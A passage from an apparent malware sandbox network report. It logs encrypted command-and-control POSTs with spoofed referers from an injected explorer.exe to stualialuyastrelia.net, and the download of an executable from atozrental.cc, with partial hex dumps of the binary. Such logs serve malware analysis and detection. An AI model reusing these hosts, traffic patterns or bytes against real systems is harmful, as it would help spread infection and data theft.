79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Nov 30, 2023 11:19:49.558216095 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uxsitwqidnqu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:49.809222937 CET	1340	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 29 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 6e 5f e4 19 77 c0 f2 70 db 90 09 bc 07 03 d5 7f 8f 91 02 5e e0 3d 38 76 12 0f 89 fd 6b f3 d3 bf 20 ac 92 c9 ba da b7 c8 13 5a c4 b0 f3 f1 b1 72 3b 0a 90 f3 db a2 dd a4 78 ee 09 b5 27 7a 3b cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 78 8d 55 db c4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 ee 60 51 61 d6 d5 39 7c 62 be a0 2d 6b a1 c0 4a 9a 03 fd ec 7e aa 79 8d 8c 2e b4 69 0d 70 5d bf 46 04 e3 f8 12 6c 33 6c b9 6e 0a 8d c7 ed e4 0e a4 2b 7e 71 eb 80 f5 0a 68 8b 4a d8 19 be cc 4f 3e 79 82 ae 9c 97 02 4c 70 56 ad f3 57 3b 2a b9 72 1e d2 23 b2 65 0e 31 79 92 90 f7 dd f5 ec e7 72 2b 5c 80 d0 02 f9 13 63 11 ab d6 af 21 3c 27 d4 69 b7 9f 23 c9 cc 46 b9 8b 15 ac cb eb d9 55 45 6e ba 68 1e 0e ff 9d 7f df 4b 40 17 67 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 3a 7a b1 35 2f 12 51 dc b0 17 4b 9d 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f d4 9c 68 91 d8 29 06 f1 2c 5e ae 03 8b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 57 24 08 3b b8 b9 8b 8b d1 ce 7a d7 9c 98 c3 e0 2b 19 b4 bb 01 6a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 ed d0 d9 57 2e f2 87 7d bd 41 f5 52 63 c0 3a 96 4d 0b e7 17 3f cc e5 7e 4d 66 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e df 96 ce ac 1b fc a2 d3 6c a8 ca d4 23 8b 42 43 9c 85 03 62 18 9a 1c f8 40 7a ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f 8b e2 09 28 c8 71 4a ac 18 b8 77 b3 cb 26 89 19 13 08 bb 8c f5 d8 9f 52 b9 b1 e8 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 47 b2 52 1c 34 fd f9 6c 57 21 01 7d d4 56 92 96 7f 98 25 27 9d bf 2f 42 56 50 d5 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f 96 a6 b8 b8 d0 c3 fd ea 0e 18 5e 32 90 ea f3 32 42 62 27 16 12 57 0b e9 17 80 93 e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a d8 a3 19 1f 3f fd 0c 95 8b 5a 2a 01 3a c0 fd 58 b3 6c 8b 25 1c d0 53 72 5e b5 2d b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 8f 76 62 d1 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>)%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGn_wp^=8vk Zr;x'z;\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~ExU$Oa~i~_DzN,`Qa9\|b-kJ~y.ip]Fl3ln+~qhJO>yLpVW;r#e1yr+\c!<'i#FUEnhK@g{9f(B@w=f:z5/QKk^NTUo)2([T&}WLh),^}tW$;z+j(FzkW.}ARc:M?~Mfpvn%.l#BCb@z3%}/(qJw&RLEsCGR4lW!}V%'/BVPse%x`80_^22Bb'WQ =TZ\Z?Z*:Xl%Sr^-m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC\| K)=1n.rG)"@BoU
Nov 30, 2023 11:19:50.766011953 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://osdffosdosxxvy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:51.014473915 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Nov 30, 2023 11:19:51.036420107 CET	335	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ununmpymegeojv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:51.287055969 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 81 1e cb 46 d7 f8 14 a2 25 bf 29 46 16 36 e4 69 1e 2b 85 56 2d 0e 61 9f bd 8c ac 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fUys/~(`:F%)F6i+V-a0
Nov 30, 2023 11:19:58.023420095 CET	333	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ncpwljvhipki.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: stualialuyastrelia.net
Nov 30, 2023 11:19:58.273061991 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Nov 30, 2023 11:19:58.724335909 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:19:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	175.126.109.15	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:19:54.762180090 CET	219	OUT	GET /atoz/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: atozrental.cc
Nov 30, 2023 11:19:55.601288080 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 30 Nov 2023 10:19:55 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=37ee76c1.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 04 66 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 8c 02 00 00 92 69 02 00 00 00 00 42 37 00 00 00 10 00 00 00 a0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 6b 02 00 04 00 00 2e 3e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 8f 02 00 78 00 00 00 00 00 6a 02 80 e3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 27 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 8a 02 00 00 10 00 00 00 8c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 7c 55 67 02 00 a0 02 00 00 18 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 e3 01 00 00 00 6a 02 00 e4 01 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfciB7@k.>xj@'@.text, `.data\|Ug@.rsrcj@@
Nov 30, 2023 11:19:55.601331949 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 96 02 00 00 00 00 00 26 96 02 00 40 96 02 00 00 00 00 00 Data Ascii: `&@0@Th$F\j~,N\j~ .@Rh
Nov 30, 2023 11:19:55.881840944 CET	1340	IN	Data Raw: 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 68 65 61 70 0d 0a 00 00 00 00 52 36 30 32 37 0d 0a 2d 20 6e 6f 74 20 65 Data Ascii: 0- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual function callR6024- not enough spa
Nov 30, 2023 11:19:55.881881952 CET	1340	IN	Data Raw: 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 00 47 65 74 55 73 65 72 4f 62 6a 65 63 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 Data Ascii: WindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLLBBe+000~PAGAIsProcessorFeaturePresentKERNEL32 !"#$%&'()*+,-./0123456789:;<=>?@A
Nov 30, 2023 11:19:55.881966114 CET	1340	IN	Data Raw: 82 01 82 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 10 00 10 00 10 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 Data Ascii: H
Nov 30, 2023 11:19:55.882009029 CET	1340	IN	Data Raw: 6e 00 53 61 74 75 72 64 61 79 00 00 00 00 46 72 69 64 61 79 00 00 54 68 75 72 73 64 61 79 00 00 00 00 57 65 64 6e 65 73 64 61 79 00 00 00 54 75 65 73 64 61 79 00 4d 6f 6e 64 61 79 00 00 53 75 6e 64 61 79 00 00 53 61 74 00 46 72 69 00 54 68 75 00 Data Ascii: nSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTueMonSun1#QNAN1#INF1#IND1#SNANSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecbad allocationhixozoxakukolur
Nov 30, 2023 11:19:56.162477016 CET	1340	IN	Data Raw: c0 10 40 00 a1 78 b0 42 00 89 45 d8 a1 7c b0 42 00 89 45 dc 8d 45 f0 89 75 f0 e8 a7 ff ff ff a1 80 b0 42 00 81 45 f0 3f 02 00 00 89 45 e0 a1 84 b0 42 00 89 45 d4 c7 45 e8 20 00 00 00 c7 45 f4 02 00 00 00 83 45 f4 03 8b c3 c1 e0 04 83 3d 20 f4 a9 Data Ascii: @xBE\|BEEuBE?EBEE EE= Eu.VV@VVV<@3fE}fuV\@VV@EE =u@.=u5pM}E=UE1E3U= UuVVVVVV@E
Nov 30, 2023 11:19:56.162549973 CET	1340	IN	Data Raw: 40 00 4b 75 89 e8 4f fa ff ff 5f 5e 5b 8b e5 5d c3 55 8b ec 81 ec 2c 04 00 00 53 56 33 db 57 33 f6 53 ff 15 a4 11 40 00 ff 15 a0 11 40 00 81 fe 10 27 00 00 7d 0e 8d 85 d4 fb ff ff 50 53 ff 15 0c 10 40 00 46 81 fe 4c 74 5d 00 7c d4 33 f6 bf 9d 25 Data Ascii: @KuO_^[]U,SV3W3S@@'}PS@FLt]\|3%+0@;~}tPxuF\|3St@p@@Gm F\|= uX@SYLB B$3ST@;~}tPxuF\|=
Nov 30, 2023 11:19:56.162645102 CET	1340	IN	Data Raw: ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 e8 10 40 00 cc 6a 08 e8 f2 1e 00 00 59 c3 6a 08 e8 0f 1e 00 00 59 c3 8b ff 55 8b ec 56 8b f0 eb 0b 8b 06 85 c0 74 02 ff d0 83 c6 04 3b 75 08 72 f0 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 33 c0 eb 0f 85 c0 75 Data Ascii: uYu@jYjYUVt;ur^]UVu3ut;ur^]U=@th@"Ytu@Y!h@h@YYuBhAU@g!@$@c=xYthx^"Ytjjjx3]jh B
Nov 30, 2023 11:19:56.162686110 CET	1340	IN	Data Raw: d4 a4 42 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 ec b6 42 00 e8 3e 11 00 00 59 c3 6a 20 68 68 8d 42 00 e8 54 16 00 00 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 Data Ascii: BV9Ptku;rkM^;s9Pt3]5B>Yj hhBT3}}]LtjY+t"+t+td+uD}uaBB`w\]Zt<t+Ht"3PPPPPBBBBBBE
Nov 30, 2023 11:19:56.162724972 CET	1340	IN	Data Raw: fe ff ff c1 ea 04 81 e2 ff 07 00 00 83 c4 0c 81 ea fe 03 00 00 8b 45 10 89 10 5d c3 8b ff 55 8b ec 51 51 d9 ee 8b 45 08 dd 5d f8 89 45 f8 8b 45 14 33 45 0c 25 ff ff ff 7f 33 45 14 89 45 fc dd 45 f8 c9 c3 8b ff 55 8b ec 8b 45 08 8a 4d 10 53 56 57 Data Ascii: E]UQQE]EE3E%3EEEUEMSVW3xE3xECxtEXEtEHEtEHEtEHEtEHEuE3H1HE3H1HE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	91.215.85.17	80	1340	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:05.673666954 CET	340	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://stualialuyastrelia.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: stualialuyastrelia.net
Nov 30, 2023 11:20:05.673715115 CET	4485	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 93 c1 0a d9 Data Ascii: HLeST]T {%(rB[j4A~;}f=BbOp&QD{jB+"m]it4JEBP5XO2_}/jT{;j9@O 2'`ssf4Sy6U`A
Nov 30, 2023 11:20:05.926872015 CET	653	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:20:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 